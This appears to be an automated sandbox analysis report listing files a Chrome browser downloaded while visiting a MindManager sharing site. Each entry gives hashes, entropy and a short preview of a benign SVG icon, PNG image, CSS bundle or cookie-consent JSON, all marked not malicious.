                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):786
                                                                Entropy (8bit):5.017568817786063
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2EBA1D2B38CDC5664DA18D7D8001E1D5
                                                                SHA1:2059E00F5ED6EBFCAF53D8086F6680408EA0F8B0
                                                                SHA-256:212231539466046DCB3572325C64CDAA4E7D4425E22DDBD3FC7F5349E7FE6BD5
                                                                SHA-512:EC72FE025CB64D2B21E890A933F72C6AD24B430FA99469BC2882EDD1D56E8ADB38C899B65FD6A25812276FA7086BB8EFDF9233FCB917C9AB305B0CE862649BCD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_property.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:#4f87c6;}</style></defs><title>topic_info_icon_property</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="1.5"/><path class="cls-2" d="M14,1a1,1,0,0,1,1,1V14a1,1,0,0,1-1,1H2a1,1,0,0,1-1-1V2A1,1,0,0,1,2,1H14m0-1H2A2,2,0,0,0,0,2V14a2,2,0,0,0,2,2H14a2,2,0,0,0,2-2V2a2,2,0,0,0-2-2Z"/><rect class="cls-3" x="3" y="4" width="2" height="2"/><rect class="cls-3" x="3" y="7" width="2" height="2"/><rect class="cls-3" x="3" y="10" width="2" height="2"/><rect class="cls-2" x="6" y="5" width="7" height="1"/><rect class="cls-2" x="6" y="8" width="7" height="1"/><rect class="cls-2" x="6" y="11" width="7" height="1"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:downloaded
                                                                Size (bytes):63419
                                                                Entropy (8bit):5.403664628819526
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E3D76F8BC5704E1E8E71BB22A91ED4FA
                                                                SHA1:032B1F5185419DBFFB99B898B959A2EB3413A2AC
                                                                SHA-256:F40F57620246D052EA666F8F9D25DC6FCD93A7BBD6314077A2EB7213E98A4B5A
                                                                SHA-512:07C00B4A95C5C1EF435796DF7A712BAC43EE20EF330613F73ECFF7015BCA36DD9D3BFFB5A88834E522941F90F86C3FAC727E0EC3CD020BC7D2F0955A009E13B1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cdn.cookielaw.org/scripttemplates/202402.1.0/assets/v2/otPcCenter.json
                                                                Preview:. {. "name": "otPcCenter",. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iPjxkaXYgcm9sZT0iYWxlcnRkaWFsb2ciIGFyaWEtbW9kYWw9InRydWUiIGFyaWEtZGVzY3JpYmVkYnk9Im90LXBjLWRlc2MiPjwhLS0gQ2xvc2UgQnV0dG9uIC0tPjxkaXYgY2xhc3M9Im90LXBjLWhlYWRlciI+PCEtLSBMb2dvIFRhZyAtLT48ZGl2IGNsYXNzPSJvdC1wYy1sb2dvIiByb2xlPSJpbWciIGFyaWEtbGFiZWw9IkNvbXBhbnkgTG9nbyI+PC9kaXY+PGJ1dHRvbiBpZD0iY2xvc2UtcGMtYnRuLWhhbmRsZXIiIGNsYXNzPSJvdC1jbG9zZS1pY29uIiBhcmlhLWxhYmVsPSJDbG9zZSI+PC9idXR0b24+PC9kaXY+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBpZD0ib3QtcGMtY29udGVudCIgY2xhc3M9Im90LXBjLXNjcm9sbGJhciI+PGgyIGlkPSJvdC1wYy10aXRsZSI+WW91ciBQcml2YWN5PC9oMj48ZGl2IGlkPSJvdC1wYy1kZXNjIj48L2Rpdj48YnV0dG9uIGlkPSJhY2NlcHQtcmVjb21tZW5kZWQtYnRuLWhhbmRsZXIiPkFsbG93IGFsbDwvYnV0dG9uPjxzZWN0aW9uIGNsYXNzPSJvdC1zZGstcm93IG90LWNhdC1ncnAiPjxoMyBpZD0ib3QtY2F0ZWdvcnktdGl0bGUiPk1hbmFnZSBDb29raWUgUHJlZmVyZW5jZXM8L2gzPjxkaXYgY2xhc3M9Im90LXBsaS1oZHIiPjxzcGFuIGNsYXNzPSJvdC1saS10aXRsZSI+Q2
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):627
                                                                Entropy (8bit):5.2116770710188876
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D005BB32E9CBE82882C2A6688D6D28EE
                                                                SHA1:6FA3EC5813FEE75A1925ED9FA5BDAA8F9FBE6312
                                                                SHA-256:88D1AC3E53A80F26141ECC294F7D9913C5D07316ED667CBE0F5E74D63AB4A722
                                                                SHA-512:9ACF872A7B40DFEB7819E44072B02A4E610FF9C6B4882C8DB97C511D11B5D1E20BC9AEECBDC843F4EB5DE361E8F7B425709F01B684850AEDF0F4FFE66C4181C9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/design/top-menu-layout.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 7"><defs><style>.cls-1{fill:none;stroke:#3271ae;}.cls-1,.cls-2{stroke-miterlimit:10;}.cls-2{fill:#efeeee;stroke:#4a4a4a;}</style></defs><title>layout-radial</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><line class="cls-1" x1="10" y1="3.5" x2="12" y2="3.5"/><path class="cls-1" d="M16,6.5H14A1.48,1.48,0,0,1,12.5,5V2A1.48,1.48,0,0,1,14,.5h2"/><line class="cls-1" x1="6" y1="3.5" x2="4" y2="3.5"/><path class="cls-1" d="M0,6.5H2A1.48,1.48,0,0,0,3.5,5V2A1.48,1.48,0,0,0,2,.5H0"/><circle class="cls-2" cx="8" cy="3" r="2.5"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1379
                                                                Entropy (8bit):4.363015398363102
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:682DDB8C6A4BB5BC7170ECE2A66E5D07
                                                                SHA1:16123B5E27FA550F02652C4847C232DAAFFC4D9E
                                                                SHA-256:16ACF14CC7C497692A672388C4D670D34187B2259D730CF4D5BA0C8E50BC2AC9
                                                                SHA-512:E0F4E3538C4B52D9FD3357B450E629328FF58A44CC2AD4CF6CC852B2B1C2D7F96ED51985F98615D5C0BA303E9E8CEE23F762A3E1106EC3247712CE8C5B9BD4DF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/link.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16.29 16.3"><defs><style>.cls-1{fill:#3b53a4;stroke:#3b53a4;stroke-miterlimit:10;}</style></defs><title>attachments</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M2.56,15.56a3.18,3.18,0,0,1-1.09-.72,3.29,3.29,0,0,1-.73-1.1A3.35,3.35,0,0,1,.5,12.49a3.39,3.39,0,0,1,.24-1.25,3.19,3.19,0,0,1,.73-1.1L4.74,6.87a3.19,3.19,0,0,1,1.09-.72,3.34,3.34,0,0,1,2.5,0,3.21,3.21,0,0,1,1.09.72.45.45,0,1,1-.63.63A2.34,2.34,0,0,0,8,7,2.44,2.44,0,0,0,6.17,7a2.33,2.33,0,0,0-.79.53L2.1,10.78a2.33,2.33,0,0,0-.53.8,2.44,2.44,0,0,0,0,1.82A2.39,2.39,0,0,0,2.9,14.72a2.47,2.47,0,0,0,.91.18,2.44,2.44,0,0,0,1.71-.7l2.76-2.76a.45.45,0,1,1,.63.63L6.15,14.83a3.19,3.19,0,0,1-1.09.72,3.36,3.36,0,0,1-1.25.24A3.33,3.33,0,0,1,2.56,15.56ZM8,10.16a3.2,3.2,0,0,1-1.09-.73.45.45,0,0,1,0-.63.46.46,0,0,1,.64,0,2.33,2.33,0,0,0,.79.53,2.44,2.44,0,0,0,1.82,0,2.34,2.34,0,0,0,.79-.53l3.27-3.28a2.27,2.27,0,0,0,.54-.79,2.44,2.44,
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):80
                                                                Entropy (8bit):4.33221219626569
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1AE6B27EBA211F4CFCD99B904DA88BB7
                                                                SHA1:53CA38F083C4A21F2EDA633EC304CB4582EDEDA2
                                                                SHA-256:961635B4E9661208EC118D285B3AC1DBF9F3CC96CDDC97F30E55CD2C6566448C
                                                                SHA-512:7DD325AB05B1A419614C2C39224C11E1388F09BCA5EA0F56811E6842B4FB243BCB53AA2BDDE00A94FBC324222B47924152C183337EB390F58C59AC80E89593B6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:jsonFeed({"country":"US","state":"NY","stateName":"New York","continent":"NA"});
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 34 x 22, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):311
                                                                Entropy (8bit):6.637040278100033
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CE8481BA3F6095EC02AE31339B3BC882
                                                                SHA1:865421835E87D52D6B2BE79B8F84422234D6EEAF
                                                                SHA-256:57007CC86EF7A3069038613BC6DBD1F93F1CC6C507BC4368A799E19507E4A036
                                                                SHA-512:5079047132044FAA748A37E3DF8CC51402BC0BF77EF8386AF9314E3AD15E08A3A43EF2C2FAA36A329AE5C07245F12168BACB401C403F482BEA2BD45B406978F6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-line-s-bend.png
                                                                Preview:.PNG........IHDR..."...........Ny....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.5......2.b...}.i.....R.@......4b!.1..9......GPH.Ph..,.^ ..`.<`. 4....h`...1Q..(...GP....Q..:d.!...u.....8.X..Q.$t.R.. ..H..V.n..!PG..b~2.H.'pF..(&...b.`......7...91`......X.....R8.h.c(....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):666
                                                                Entropy (8bit):5.145756040779558
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:416E1FE0C577A7388FC73F51A9C1787B
                                                                SHA1:3B7D9807BA08893F7BDDBAFA268E7C74ED2416A5
                                                                SHA-256:4BE1F0B69D9389CD63042988D0047BDDB5C866DE5053BD7867E9B9F0BD91AE1B
                                                                SHA-512:A6B1F97D7D87681F64D379EB30B5D57ADB7DE872CF94B80B0DBC3580D0243629639E602320B0EEFED0D186DF85621EC9B17329A5D409469B4F8D054B14AD86CF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/rocket.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#9a9aa3;}.cls-2{fill:#fff;}.cls-3{fill:#1c97e6;}</style></defs><title>rocket_16</title><path class="cls-1" d="M12,15c0-.08,0-3.17,0-3.25v-5C12,4.69,8,.5,8,.5S4,4.69,4,6.75v5c0,.08,0,3.17,0,3.25Z"/><circle class="cls-2" cx="8" cy="8" r="3"/><circle class="cls-3" cx="8" cy="8" r="2"/><path class="cls-1" d="M11,5A26,26,0,0,0,7.75.5,26,26,0,0,0,4.54,5Z"/><polygon class="cls-3" points="5 10.5 1.5 15 5 15 5 10.5"/><polygon class="cls-3" points="11 10.5 14.5 15 11 15 11 10.5"/><polygon class="cls-3" points="7.9 11 8.6 11 10 16 6.5 16 7.9 11"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (46052)
                                                                Category:downloaded
                                                                Size (bytes):4029577
                                                                Entropy (8bit):5.9982492205442135
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B8010FE1E97075377D7A220E832AB709
                                                                SHA1:B750A4309B50DF35AF4040F495E9ABED5E872E28
                                                                SHA-256:30399EA1D752B2A613F4ED2E321DA890EE4C8BBE96856C5ACE93C8B6A24251CB
                                                                SHA-512:4F8AF7C8C6B8C3C6985A173DD40582CE539D2D227C0448683B4EC5B64950199F1FE493682C7F1E021620F7B962BEC229A2E38066751353860DD1A81CAB3F86E1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/css/app.min.css?v=23.2.206
                                                                Preview:/*! Rappid v3.0.1 - HTML5 Diagramming Framework..Copyright (c) 2015 client IO.. 2019-08-23 ...This Source Code Form is subject to the terms of the Rappid License., v. 2.0. If a copy of the Rappid License was not distributed with this.file, You can obtain one at http://jointjs.com/license/rappid_v2.txt. or from the Rappid archive as was distributed by client IO. See the LICENSE file.*/....joint-viewport{-webkit-user-select:none;-moz-user-select:none;user-select:none}.joint-paper-background,.joint-paper-grid,.joint-paper>svg{position:absolute;top:0;left:0;right:0;bottom:0}[magnet=true]:not(.joint-element){cursor:crosshair}[magnet=true]:not(.joint-element):hover{opacity:.7}.joint-element{cursor:move}.joint-element *{user-drag:none}.joint-element .scalable *{vector-effect:non-scaling-stroke}.marker-source,.marker-target{vector-effect:non-scaling-stroke}.joint-paper{position:relative}.joint-highlight-opacity{opacity:.3}.joint-link .connection,.joint-link .connection-wrap{fill:none}.marker-v
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):268
                                                                Entropy (8bit):5.111190711619041
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:59759B80E24A89C8CD029B14700E646D
                                                                SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2164
                                                                Entropy (8bit):4.832167464725968
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8A53920B60AE5CFD791539034CE610ED
                                                                SHA1:85E38CBA05E99A00F7DFAB550C0303B3E669D153
                                                                SHA-256:777FFF6FF22B420B1D24DCB19B63B1623973BAA90CF01AF05DDE97E002EBEDBB
                                                                SHA-512:B4C0E58278906A8B557934BDB78217B8A404C8B3EA16C72D43E3E47D59A3CBDD175F4AE1E076EF26E1912F211ABDFAC81BE456A2514DFCDAE340051CF2489954
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/basicflowchart.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="127.416" y="34.9062" width="32.5844" height="10.1117" rx="5.05585" fill="#ACEA87"/>.<rect x="9" y="34.8691" width="28.2398" height="10.1117" rx="5.05585" fill="#5791C0"/>.<rect x="69.2266" y="2.10547" width="24.8826" height="9.92786" fill="#66B7F8"/>.<ellipse cx="69.8177" cy="7.0694" rx="2.96222" ry="4.96393" fill="#66B7F8"/>.<path d="M97.164 7.06702C97.164 8.6694 96.7824 10.0957 96.1915 11.1043C95.5935 12.1248 94.8404 12.634 94.1093 12.634C93.3783 12.634 92.6252 12.1248 92.0272 11.1043C91.4363 10.0957 91.0547 8.6694 91.0547 7.06702C91.0547 5.46465 91.4363 4.03838 92.0272 3.02975C92.6252 2.00922 93.3783 1.5 94.1093 1.5C94.8404 1.5 95.5935 2.00922 96.1915 3.02975C96.7824 4.03838 97.164 5.46465 97.164 7.06702Z" fill="#66B7F8" stroke="white"/>.<path d="M81.7956 31.8691L105.691 39.9585L81.7956 48.0479L57.9004 39.9585L81.7956 31.8691Z" fill="#66B7F8"/>.<path d="M57.8748 39.9219L52.8748
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):514
                                                                Entropy (8bit):5.219929961634266
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:30CEC39DDFA036A7C053168E64F4C72E
                                                                SHA1:5E4517D8501C5AEA26657631FB5ADC740458C8E1
                                                                SHA-256:5D8165BBAE347A8C39A6F6A595D439FC1A7D0A7896B7A484BD5F09B3C18B613D
                                                                SHA-512:8D1F06A2B711BE1DD19CF308E7BFF173853A0725875D9549730935415C7CE4B7DD4033AE4FB1908A3C7FF0AFA488C9C37C5BFB223DA73263747B53DA91FFFA6E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/percentageDone03.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}</style></defs><title>percentageDone03</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8.5,7.5v-7a7.49,7.49,0,0,1,7,7Z"/><path class="cls-4" d="M9,1.07A7,7,0,0,1,14.93,7H9V1.07M8,0V8h8A8,8,0,0,0,8,0Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):10895
                                                                Entropy (8bit):3.9543755305374377
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8D5EFE496AF9E5E438B9353DC1C1C801
                                                                SHA1:3CC066619F1EFF6B96FB23FB62F13E9F91B2B573
                                                                SHA-256:17D19538748DEEB9C2E9938B7982880AF11E4EDBB3B13C374E127067AE848F2F
                                                                SHA-512:D56675DB9C61F2DFE033F2CA5741B1F1C4517137C391D5FDD0A981A323730EA608FF6EF152BB26F44F9C86972AD44689917DF9A68C15AB6675A7588934147E11
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/loader/mm-23-icon-text-logo.svg
                                                                Preview:<svg width="239" height="33" viewBox="0 0 239 33" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M15.8026 11.6843L8.14941 28.2172C9.0768 27.1062 10.2455 26.2155 11.5688 25.6113C12.8921 25.0071 14.3361 24.7048 15.7938 24.7268C17.2509 24.7048 18.6943 25.0072 20.0169 25.6114C21.3395 26.2156 22.5074 27.1063 23.4339 28.2172L15.8026 11.6843Z" fill="#84DDDA"/>.<path d="M30.5909 0.658203H22.0204C21.9057 0.658979 21.7933 0.690746 21.6955 0.750064C21.5977 0.809381 21.5182 0.89399 21.4656 0.994728L15.7869 11.6859L10.1344 0.994728C10.0815 0.893341 10.0013 0.808307 9.90269 0.748946C9.80406 0.689586 9.69079 0.658191 9.5753 0.658203H1.01791C0.907404 0.658202 0.797985 0.67977 0.695943 0.721669C0.593901 0.763568 0.501249 0.824971 0.423311 0.90235C0.345373 0.979729 0.283686 1.07156 0.241795 1.17256C0.199904 1.27356 0.178635 1.38174 0.179211 1.49089V27.3774C0.179211 27.5971 0.267574 27.8078 0.424861 27.9632C0.582148 28.1185 0.795475 28.2058 1.01791 28.2058H8.15125L15.8131 11.6859L23.4445 28.218
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2064
                                                                Entropy (8bit):4.825350543877029
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:40A55DF57F4CD959DF09A2A0069A6E11
                                                                SHA1:02CC1A81E3B5538D8C33DD7D683BCAA9477E1C50
                                                                SHA-256:0292B07055ADB3932AB9C072325ECC9C0144B27FFA270BC769AF95E028594352
                                                                SHA-512:C094B3037120BE44FD51B1B0AA7D207494FF92602856B793F4DF6A9D2E19C9541E97CA7225E794B9CF31F620446C9E8543513B8C71D31156041560096D95BC18
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/reversebrainstorming.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="34" y="2" width="49.5098" height="24.1023" rx="2" fill="#64839A"/>.<rect x="85.4902" y="2" width="49.5098" height="24.1023" rx="2" fill="#F2B6B0"/>.<rect x="34" y="28.3945" width="32.234" height="59.6818" rx="2" fill="#E2D7ED"/>.<rect x="68.3809" y="28.3945" width="32.234" height="59.6818" rx="2" fill="#CFEDE6"/>.<rect x="102.766" y="28.3945" width="32.234" height="59.6818" rx="2" fill="#FEDD72"/>.<rect x="45.4727" y="9.26758" width="10.2413" height="10.2413" fill="white" fill-opacity="0.2"/>.<rect x="51.8828" y="38.8203" width="10.2413" height="10.2413" fill="white" fill-opacity="0.2"/>.<rect x="53.9883" y="53.5508" width="10.2413" height="10.2413" fill="white" fill-opacity="0.2"/>.<rect x="37.1543" y="60.9141" width="10.2413" height="10.2413" fill="white" fill-opacity="0.2"/>.<rect x="51.8828" y="69.3301" width="10.2413" height="10.2413" fill="white" fill-opacity="0.2"/>.<rect x
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):368
                                                                Entropy (8bit):5.184030017996384
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C6DEB7D7E9D8E2C729EB8D239E4FFEDB
                                                                SHA1:BFDD5EF122CC96DF18D50E28D9C5A9580220CEFD
                                                                SHA-256:4499634DCA4AA03F3310A4D540ED317642539E4C6704306035344D9FA87F7A44
                                                                SHA-512:FBF36325F5F2F26BA69F3ACA3A20293415547B42FE15AE3F5341A222D16168DC7DD4C7C846DBB011E6DC00A826E3A26EA2BED8C196848A4CD1A98C4913C1A914
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/rectangle.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 12"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><title>background_shape_Asset 66</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="15" height="11"/><path class="cls-2" d="M15,1V11H1V1H15m1-1H0V12H16V0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):577
                                                                Entropy (8bit):5.025780186440227
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:31C9824F99C395AA11A2B46A33564FE9
                                                                SHA1:B183B59926FE26AA67C2467CA20CC3124782A0B0
                                                                SHA-256:D6D8955CCB5636B0EF523F413A52EC1DDB4EF391046D8AFD0124275F8D265173
                                                                SHA-512:19406E9051E93A691823F8069778557C01C5490AE34CA1F71F77850A3F24FF2DD01AFAE858474B7AAF878DB7ED72BA0B1718B1C943C66002010EBCB57DE7DAE8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-presentation/svg/zoom-in.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 13.35 13.35"><defs><style>.cls-1{fill:#3a52a4;stroke:#3a52a4;stroke-miterlimit:10;}</style></defs><title>2018 Publish - zoom plus</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M12.52,6.35a.32.32,0,0,1,.33.33.32.32,0,0,1-.09.23.32.32,0,0,1-.24.09H7v5.52a.33.33,0,0,1-.32.32.32.32,0,0,1-.32-.32V7H.82A.31.31,0,0,1,.6,6.91a.31.31,0,0,1-.1-.23.32.32,0,0,1,.1-.24.31.31,0,0,1,.23-.09H6.35V.82A.33.33,0,0,1,6.68.5.31.31,0,0,1,6.9.6.31.31,0,0,1,7,.82V6.35Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 51 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):296
                                                                Entropy (8bit):6.765566091761483
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3B6F5EC0DE8DA4E8D5FF821B9AF138BE
                                                                SHA1:4DFBF50AC110E7B1B040279B2AF5C003D1BB7320
                                                                SHA-256:F1AF138540B8A25F5E4FA32012BF6C8EFC45EE1AAF3E03333B64C8D0BD834E41
                                                                SHA-512:E5493155114B76AAD8AABCEBC6BAEA836D71FC27F7B1B261AA3F2B57AD43A8D4F70E547186D8323CADEA76F493C624D30D6FA245E91BD2AF4CFC4EE74BA4D0CA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-align-left-selected.png
                                                                Preview:.PNG........IHDR...3...0......5B.....pHYs.................tIME.......3.0.....IDATh.....0...L.".O.) MP.MP...!.H...y.{......F..........n.....I.R...xJ..@.P..Y.O.(T.E.g.0...f..-'..B'.[PE.)gf..f...h...X4.c..Y3..-.Z.3q<_..M....a...l.....M..^k...0..]4[M._.....^(?...0...)D...._$.<u.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):4475
                                                                Entropy (8bit):7.6666037763098736
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9D50A0E6BE4F71457F664F88912B3C9D
                                                                SHA1:8DD4CA7C6BA5A7EFF79F771F01A8585E1A3AB27B
                                                                SHA-256:FAB3285F511FA5BCA0CBCD80EACC8B1BBA4B360F7A99B9D254446797F4AF23AE
                                                                SHA-512:1D8D6477110EA7A8CAC19062C0462C0184CC2CB3DE7ADEA910B74601E36FC9A063BBE9C43A9B2F441422480EF4A8467D1AC9F39D6526888F4F4C25811C08F093
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/mmlogo.png
                                                                Preview:.PNG........IHDR................a....gAMA......a....KiCCPsRGB IEC61966-2.1..H..SgTS..=...BK...KoR.. RB..Ti........@...."....q....."..A...y.(..(6T....}..7o....9g..}>.F`.D....dJ....<6..'w..T ...@.-.................m@..n....8..P.....$......B....2r.2..2...t...%..[.....j..;e.O..v.$....(S*.@..@&.......X......`.(..s....`....`....).d....`...S......GE...3.(...x.W\!.S...d..T.n!...\].x.87C.P........ee......3...FvD.....9;.:;.8.:|...........?........E..............e..../.....B.._......T.B.fg...k+..m.._......_.....................2..r<[&..q.?......wL..'..b.P.GK..i....$.I...H.........k.`.~..B[P..... ..%....w......1...w..0....h....................4P.6h.>....#..;x...P..8X.BH.L.C.,.UP.%...B..Z..F8.-p.........<.^...0.o`.A.2.DX.6b..".#.Ef!~H0...!.H."E..Rd5R..#U.^....9..E.!=.=...F~C>...@..j..\...B...h....G...h%Z..B.......>G.0....3.l0...B.x,..c.b......6.....b#.{..."....;!.0. $,",'..........B.a...$....nD>1..B.%..+.u.c...[.......!..\H..8R.i......D:C.!....d.6..A.%...r.y;...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                Category:downloaded
                                                                Size (bytes):36696
                                                                Entropy (8bit):7.988666025644622
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
